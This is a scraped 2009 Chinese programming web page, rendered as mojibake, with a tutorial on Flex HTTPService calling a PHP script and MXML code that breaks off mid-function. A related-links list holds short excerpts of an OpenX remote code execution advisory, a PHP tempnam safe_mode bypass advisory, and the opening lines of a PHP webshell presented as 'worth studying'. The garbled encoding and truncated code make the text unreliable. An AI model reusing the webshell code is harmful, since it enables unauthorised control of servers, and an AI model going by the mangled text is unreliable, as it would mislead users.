Ò׽ؽØÍ¼Èí¼þ¡¢µ¥Îļþ¡¢Ãâ°²×°¡¢´¿ÂÌÉ«¡¢½ö160KB

HTTPServiceÓëPHPͨÐÅ

ÔÚFlexÖÐÓÐ2¸öHTTPServiceÀ࣬ËüÃǵÄÍêÕû¼Ì³Ð·¾¶·Ö±ðÊÇmx.rpc.httpºÍmx.rpc.http.mxml,¿ÉÒÔ¿´³ömx.rpc.http.mxmlÊÇmx.rpc.httpµÄ×ÓÀà¡£mx.rpc.http.mxmlÖеÄhttpServiceÖ÷ÒªÊÇΪÁËMXML±êÇ©ÖÐʹÓÃHTTPService¶øÉèµÄ¡£mx.rpc.httpÊÇÔÚʹÓÃas½Å±¾½øÐвÙ×÷ʱʹÓᣵ±µ÷Óà HTTPService ¶ÔÏóµÄ send() ·½·¨Ê±£¬½«·¢³ö¶ÔÖ¸¶¨ URL µÄ HTTP ÇëÇ󣬲¢ÇÒ·µ»Ø HTTP ÏìÓ¦¡£¿ÉÒÔÑ¡ÔñÏòÖ¸¶¨ URL ´«µÝ²ÎÊý¡£Èç¹ûûÓÐʹÓûùÓÚ·þÎñÆ÷µÄ´úÀí·þÎñ£¬ÔòÖ»ÄÜʹÓà HTTP GET »ò POST ·½·¨¡£
send
()
·½·¨
 
public function send(parameters:Object = null):AsyncToken
Ö´ÐÐ HTTPService ÇëÇó¡£²ÎÊýÊÇ¿ÉÑ¡µÄ£»µ«Èç¹ûÖ¸¶¨²ÎÊý£¬ËùÖ¸¶¨µÄÖµÓ¦¸ÃÊǰüº¬Ãû³Æ/Öµ¶ÔµÄ Object »ò XML ¶ÔÏó£¨È¡¾öÓÚ contentType£©¡£
²ÎÊý
 
parameters:Object (default = null)
·µ»Ø
 
AsyncToken — ±íʾÒì²½Íê³É±ê¼ÇµÄ¶ÔÏ󡣸öÔÏóÓë result »ò fault ʼþµÄ token ÊôÐÔÖеĶÔÏóÏàͬ¡£
setCredentials
()
·½·¨
 
ÏÂÃæÊÇÒ»¸öʹÓÃHTTPServiceÓëPHPͨÐŵÄÀý×Ó£¬PHP·µ»ØÒ»¸öXMLÎı¾´®£¬FLex½«Õâ¸öXML´®ÏÔʾÔÚDataGRid¿Ø¼þÖС£
Flex´úÂ루ע£ºÏÂÃæµÄ´úÂëдÔÚÒ»¸öFlexÄ£¿éÖУ©£º
<?xml version="1.0" encoding="utf-8"?>
<mx:Module xmlns:mx="http://www.adobe.com/2006/mxml" layout="absolute" width="438" height="324" fontSize="12" creationComplete="CreationComplete()">
<mx:Script>
<!--[CDATA[
import mx.rpc.http.HTTPService;
import mx.rpc.events.ResultEvent;
import mx.rpc.events.FaultEvent;
[Bindable]
private var xml:XML;
private var http:HTTPService;

public function onclose():void{
this.parent.parent.parent.removeChild(this.parent.parent);

}

public function CreationComplete():void{
this.GetItem();


}

private function GetItem():void{
http = new HTTPService();
http.url="http://localhost/PHPAsset/getunit.php";
http.method="POST";
http.resultFormat="e4x";
http.useProxy=false;
http.addEventListener(ResultEvent.RESULT,onResult);
http.addEventListener(FaultEvent.FAULT,onFault);
http.send();



}
private function onFault(


Ïà¹ØÎĵµ£º

PHP ÖÐÇÉÓÃÊý×é½µµÍ³ÌÐòµÄʱ¼ä¸´ÔÓ¶È

OpenX adserver version 2.8.1 and lower is vulnerable to remote code
execution. To be exploited, this vulnerability requires banner / file
upload permissions, such as granted to the 'advertiser' and
'administrator' roles.
This vulnerability is caused by the (insecure) file upload mechanism of
af ......

PHP tempname()º¯ÊýÈÆ¹ýsafe_mode°²È«ÏÞÖÆÂ©¶´

BUGTRAQ ID: 36555
CVE ID: CVE-2009-3557
PHPÊǹ㷺ʹÓõÄͨÓÃÄ¿µÄ½Å±¾ÓïÑÔ£¬ÌرðÊʺÏÓÚWeb¿ª·¢£¬¿ÉǶÈëµ½HTMLÖС£
PHPµÄtempnam()ÖеĴíÎó¿ÉÄÜÔÊÐíÈÆ¹ýsafe_modeÏÞÖÆ¡£ÒÔÏÂÊÇext/standard/file.cÖеÄÓЩ¶´´úÂë¶Î£º
PHP_FUNCTION(tempnam)
{
char *dir, *prefix;
int dir_len, prefix_len;
size_t p_len;
char ......

Ò»php´óÂí£¬ÖµµÃÑо¿

<?php
#--Config--#
$login_password= '123456'; //ÕâÊÇÃÜÂë
#----------#
error_reporting(E_ALL);
set_time_limit(0);
ini_set("max_execution_time","0");
ini_set("memory_limit","9999M");
set_magic_quotes_runtime(0);
if(!isset($_SERVER))$_SERVER = &$HTTP_SERVER_VARS;
if(!isset($_POST))$_PO ......

LAMP(Linux+Apache+MySQL+PHP)·þÎñÆ÷µÄÐÔÄÜÓÅ»¯

ĿǰLAMP (Linux + Apache + MySQL + PHP) ½ü¼¸ÄêÀ´·¢Õ¹Ñ¸ËÙ£¬ÒѾ­³ÉΪWeb ·þÎñÆ÷µÄÊÂʵ±ê×¼¡£LAMP 
Õâ¸ö´ÊµÄÓÉÀ´×îÔçʼÓڵ¹úÔÓÖ¾“c't Magazine”£¬Michael KunzeÔÚ1990Äê×îÏȰÑÕâЩÏîÄ¿×éºÏÔÚÒ»Æð´´ÔìÁËLAMPµÄËõд×Ö¡£ÕâЩ×é¼þËäÈ»²¢²»ÊÇ¿ª¿ªÊ¼¾ÍÉè¼ÆÎªÒ»ÆðʹÓõ쬵«ÊÇ£¬ÕâЩ¿ªÔ´Èí¼þ¶¼¿ÉÒԺܷ½±ã µÄË ......

ÔÚApacheÖÐÖ§³ÖPHPµÄÅäÖòÎÊý

´ò¿ª httpd.conf Îļþ ¼ÓÈëÒÔÏÂÅäÖÃ
ÒÔphpÄ£¿éÅäÖÃapache2.2.x 
#BEGIN PHP INSTALLER EDITS - REMOVE ONLY ON UNINSTALL by hooyes
PHPIniDir "D:/php-5.2.6-Win32/"
LoadFile D:/php-5.2.6-Win32/php5ts.dll
LoadFile D:/php-5.2.6-Win32/li ......
© 2009 ej38.com All Rights Reserved. ¹ØÓÚE½¡ÍøÁªÏµÎÒÃÇ | Õ¾µãµØÍ¼ | ¸ÓICP±¸09004571ºÅ